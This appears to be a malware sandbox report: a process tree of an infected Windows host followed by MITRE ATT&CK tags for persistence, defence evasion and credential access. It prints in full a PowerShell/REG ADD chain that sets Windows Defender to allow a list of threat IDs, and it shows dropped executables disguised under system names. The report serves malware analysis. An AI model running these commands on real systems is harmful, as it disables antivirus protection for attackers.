powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:7916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:7180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:6472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:5172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:6852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:6628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:7520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:8116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7580

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:4636

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6824

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
1⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7312

C:\Recovery\WindowsRE\conhost.exe
C:\Recovery\WindowsRE\conhost.exe
1⤵
PID:7672

C:\ProgramData\Chrome\CNSWA.exe
C:\ProgramData\Chrome\CNSWA.exe
1⤵
PID:5356

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:8984

C:\Windows\security\cap\chrome.exe
C:\Windows\security\cap\chrome.exe
1⤵
PID:8716

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:5812

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:364

C:\Program Files (x86)\Windows Media Player\lsass.exe
"C:\Program Files (x86)\Windows Media Player\lsass.exe"
1⤵
PID:3800

C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe"
1⤵
PID:1056

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe mP /IEsite_idSMA 385118 /S
1⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7292

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:6660

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:3244

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:8684

C:\Recovery\WindowsRE\conhost.exe
C:\Recovery\WindowsRE\conhost.exe
1⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:3560

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

T1064

Scheduled Task/Job

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery